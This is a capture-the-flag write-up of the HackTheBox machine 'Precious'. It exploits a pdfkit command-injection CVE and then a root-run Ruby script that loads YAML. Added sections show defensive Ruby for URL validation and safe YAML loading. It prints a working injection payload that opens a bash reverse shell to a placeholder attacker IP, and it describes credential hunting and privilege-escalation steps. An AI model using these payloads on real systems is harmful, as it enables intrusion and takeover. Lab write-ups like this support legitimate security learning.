HTB - PRECIOUS

TLDR: CVE-2022-25765 [Command Injection] + Ruby Deserialisation Gadget Chain

Writeup:

== Enumeration ==

Fired up nmap, but found nothing suspicious (just ports 22 and 80, as usual for HackTheBox).
Added the IP to '/etc/hosts', bound to 'precious.htb', and visited the web page. Seems like a converter that turns a web page, fetched from a URL, into a PDF file.
Tested it with an http link to my website but got the following error:


Picture

== How to get a PDF ==

Okay, it says "remote URL". What about localhost?
I checked it with ' http://localhost:80/ ' but got the same error.
Strange, isn't it? So I tried various other options to get a PDF, but it was always the remote error, or some other error if the input didn't start with "http(s)".
If this is the right way, how do I get something interesting? So what about fucked up input like the null byte?
Et voilà, ' http://%00 ' downloaded an empty PDF! But I didn't find a way to get any content into it.
Then I took a look at the PDF creator through the browser console:


Picture

'pdfkit v0.8.6'
Checked the version and found out that it isn't the most up to date!
Scraping GitHub, I saw a few posts about the changes since then and finally found a vulnerability that could be exploitable.



== CVE-2022-25765 ==

This vulnerability is about command injection, as the URL is not properly sanitized.
Found a PoC on Snyk's website and came up with the following payload: http://example.com/?name=#{'%20`bash -c "/bin/bash -i >& /dev/tcp/[ATTACKER IP]/[PORT] 0>&1"`'}
Spun up a netcat listener and caught a reverse shell!
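From the defender's side, the bug is that the user-supplied URL ends up inside a command string that a shell parses. The following is an added example, not pdfkit's own code, showing the two checks a practitioner would put in front of a URL-to-PDF service: an allow-list on the URL that refuses shell syntax, and a converter invocation built as an argv array so that no shell ever sees the URL. The converter name 'wkhtmltopdf' (the tool pdfkit wraps) is only placed in the argv array, not executed; the round-trip helper uses /usr/bin/printf instead, and the backtick sample is constructed to mirror the PoC shape.

```ruby
require 'uri'
require 'open3'

# Added example, not pdfkit's own code. Two defensive patterns for a
# URL-to-PDF service: an allow-list check on the submitted URL, and a
# converter invocation that never hands the URL to a shell. The converter
# name 'wkhtmltopdf' is the one pdfkit wraps; it is not executed here.

# Accepts only plain http(s) URLs with a host and refuses anything that
# carries shell syntax. Returns the URL string, or nil when rejected.
def validated_source_url(raw)
  return nil if raw.nil? || raw.strip.empty?
  # backtick, $, quotes, pipes, redirects, backslash and whitespace
  return nil if raw.match?(/[`$;&|<>"'\\\s]/)
  uri = begin
    URI.parse(raw)
  rescue URI::InvalidURIError
    return nil
  end
  return nil unless uri.is_a?(URI::HTTP) && uri.host && !uri.host.empty?
  uri.to_s
end

# Vulnerable pattern: the URL is interpolated into one command string that a
# shell parses, so a backtick-quoted command inside the URL gets executed.
def shell_command_string(url)
  %(wkhtmltopdf --quiet "#{url}" -)
end

# Hardened pattern: an argv array. Each element is exactly one argument and
# no shell is involved, so backticks in the URL are just bytes.
def converter_argv(url)
  ['wkhtmltopdf', '--quiet', url, '-']
end

# Shows the argv form in action with /usr/bin/printf standing in for the
# converter: the URL comes back byte for byte, backticks included, because
# nothing interpreted it.
def argv_roundtrip(url)
  out, _status = Open3.capture2('printf', '%s', url)
  out
end
```

The allow-list is deliberately strict (an encoded space is fine, a literal one is not), because a PDF converter has no business receiving shell metacharacters in a URL. The lasting fix is upgrading pdfkit to a patched release; the argv form is the general pattern that makes this whole bug class impossible regardless of the library.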



== User Flag ==

Since pdfkit is written in Ruby and the backend service executed my payload, I operated as "ruby-user" in the reverse shell.
So I tinkered for a bit and found a user called "Henry", but had no rights to read 'user.txt' at '/home/henry/user.txt'.
With ' grep "henry" -r 2>/dev/null ' I found a config file in ' /home/ruby/.bundle/ ' containing Henry's password!
Started an SSH session as henry and got the user flag.


website

== PrivEsc to root ==

Running linpeas is usually one of my first steps during privilege escalation, but even before that I try ' sudo -l '.


website

Henry is allowed to run ' /usr/bin/ruby /opt/update_dependencies.rb ' as root without a password.
Changed my current working directory to /opt/, looked at the Ruby script and ran it!


website
website

Looking at the error, I came to the conclusion that the script looks in the current working directory for the 'dependencies.yml' file, and in '/opt/' there was no such file.
Henry was not allowed to create or change any files in '/opt/', so I created a 'dependencies.yml' file in '/home/henry/' and wrote "test" to it.
Ran the script again and got an error back showing the content of my 'dependencies.yml' file!


website

With HTB, the root flag is usually stored in '/root/root.txt'. So I could've run ' ln -s /root/root.txt dependencies.yml ' and read its content by running the script.
However, I wanted a root shell! I can't do shit in Ruby, but I know that functions which read and parse a file (YAML loading in this case) can be abused for arbitrary command execution in various programming languages. Searching the Internet I found the following article:
https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/ . Looked promising, so I came up with:


website

After running the script once again, I just used 'bash -p' to become root and read the root flag!


website
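The script has two weaknesses as the writeup describes them: it resolves 'dependencies.yml' against the caller's working directory, and it deserialises whatever it finds there with a YAML loader that accepts Ruby object tags (the writeup does not show the script's source, so its use of YAML.load is an assumption here). The following is an added example of how the same kind of root-run script could be written defensively; it is not the box's /opt/update_dependencies.rb, the Example::Widget class name in the tagged sample is made up, and the dependency names and versions are constructed.

```ruby
require 'yaml'

# Added example, not the box's /opt/update_dependencies.rb (whose source the
# writeup does not show; use of YAML.load in it is an assumption).
# Two defensive changes for a root-run script that reads a YAML file:
#   1. resolve the file relative to the script itself, never the caller's cwd;
#   2. parse with YAML.safe_load, which refuses !ruby/object tags, instead of
#      YAML.load, which on older Psych versions instantiated arbitrary classes.

# Fixed location next to the script, independent of Dir.pwd.
DEPENDENCIES_PATH = File.expand_path('dependencies.yml', __dir__)

# Parses dependency text into {name => version}. Only plain scalars,
# sequences and mappings get through; a tagged object raises
# Psych::DisallowedClass before any class is resolved.
def parse_dependencies(text)
  data = YAML.safe_load(text, permitted_classes: [], aliases: false)
  raise ArgumentError, 'dependencies.yml must be a mapping' unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && version.is_a?(String)
      raise ArgumentError, "bad entry #{name.inspect}"
    end
  end
  data
end

# Review helper for untrusted YAML before a privileged script touches it:
# true when the text carries Ruby object tags at all.
def tagged_ruby_objects?(text)
  text.match?(%r{!ruby/})
end

# :rejected when the loader refuses the document, :loaded otherwise.
def load_outcome(text)
  parse_dependencies(text)
  :loaded
rescue Psych::DisallowedClass
  :rejected
end

# Reads and parses the file at the fixed path.
def load_dependencies_file(path = DEPENDENCIES_PATH)
  parse_dependencies(File.read(path))
end

# Constructed samples: a benign file and one carrying an object tag
# (Example::Widget is a made-up class name).
BENIGN_YAML = "yaml: 0.1.1\npdfkit: 0.8.6\n"
TAGGED_YAML = "--- !ruby/object:Example::Widget\nname: x\n"
```

With the path fixed, a user who can only write to their own home directory gains nothing from running the script from there; with safe_load, a file that does land in the right place can only ever produce strings, numbers, arrays and hashes. On Psych 4 (Ruby 3.1 and later) YAML.load already behaves like safe_load and the old behaviour lives in YAML.unsafe_load, but the explicit call makes the intent visible whatever Ruby the host runs.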



Thoughts:

Was cool, was cool. Not great though. Found any spelling or other mistakes? Cool! Keep 'em, loser...


Post by: Layton


About Myself


Layton

Coming soon, I guess
Just a S0l0N00b crushing some easy WebChallenges